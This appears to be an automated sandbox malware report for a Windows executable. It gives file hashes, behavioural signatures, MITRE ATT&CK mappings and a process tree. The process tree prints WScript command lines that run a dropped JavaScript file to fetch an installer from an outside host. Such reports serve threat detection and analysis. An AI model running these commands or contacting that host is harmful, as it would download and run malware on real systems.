abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459

General

Target

abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe
Size

184KB
MD5

5a33f88d9a0dba67419bb6ce20b4db72
SHA1

bc585e4cf5155619b0e591ab11f56570d43244a3
SHA256

abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459
SHA512

b0bdb971490b90d6e1035ab68149609745bbdadb89eb22605e616c1db5256394c0f42e533ad57bdf56cd791c10c6804e9f9596873e22e81f93a3be8a630b2001
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO37:/7BSH8zUB+nGESaaRvoB7FJNndny

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 13 IoCs

flow	pid	Process
2	1400	WScript.exe
5	1400	WScript.exe
6	836	WScript.exe
11	836	WScript.exe
13	836	WScript.exe
15	836	WScript.exe
17	836	WScript.exe
18	692	WScript.exe
20	692	WScript.exe
21	284	WScript.exe
23	284	WScript.exe
24	1668	WScript.exe
26	1668	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	2	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	18	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	21	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1664 wrote to memory of 1400	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	28
PID 1664 wrote to memory of 1400	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	28
PID 1664 wrote to memory of 1400	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	28
PID 1664 wrote to memory of 1400	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	28
PID 1664 wrote to memory of 836	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	31
PID 1664 wrote to memory of 836	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	31
PID 1664 wrote to memory of 836	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	31
PID 1664 wrote to memory of 836	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	31
PID 1664 wrote to memory of 692	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	33
PID 1664 wrote to memory of 692	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	33
PID 1664 wrote to memory of 692	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	33
PID 1664 wrote to memory of 692	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	33
PID 1664 wrote to memory of 284	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	34
PID 1664 wrote to memory of 284	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	34
PID 1664 wrote to memory of 284	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	34
PID 1664 wrote to memory of 284	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	34
PID 1664 wrote to memory of 1668	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	35
PID 1664 wrote to memory of 1668	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	35
PID 1664 wrote to memory of 1668	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	35
PID 1664 wrote to memory of 1668	1664	abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe	35

C:\Users\Admin\AppData\Local\Temp\abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe
"C:\Users\Admin\AppData\Local\Temp\abba6e43917548cfe0747f7f63fa54f09e19e961f0777ecba528bb3f1e3f5459.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1664
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28B7.js" http://www.djapp.info/?domain=McnnvZqphX.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28B7.exe
  2⤵
  - Blocklisted process makes network request
  PID:1400
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28B7.js" http://www.djapp.info/?domain=McnnvZqphX.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28B7.exe
  2⤵
  - Blocklisted process makes network request
  PID:836
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28B7.js" http://www.djapp.info/?domain=McnnvZqphX.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28B7.exe
  2⤵
  - Blocklisted process makes network request
  PID:692
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28B7.js" http://www.djapp.info/?domain=McnnvZqphX.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28B7.exe
  2⤵
  - Blocklisted process makes network request
  PID:284
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf28B7.js" http://www.djapp.info/?domain=McnnvZqphX.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf28B7.exe
  2⤵
  - Blocklisted process makes network request
  PID:1668

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fuf28B7.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\0S3MTX8U.txt

Filesize
100B

MD5
cdbb36f75b7a810676e88b213c21c467

SHA1
741c834c786e617364b133722ced917526810480

SHA256
b1c62695c33677951fb31114b820374ebcba7cb70630ef8de7afd5958075d28d

SHA512
61fb593cf5ab4293a33c12a08bd13e478ab59700753d0042d2585dc92f2118c12ce89662c1515ce3b7f2d581aede02a8422c8c760a6b5c8da50034e62d4569e2

Download Submit
memory/1664-54-0x0000000075FB1000-0x0000000075FB3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing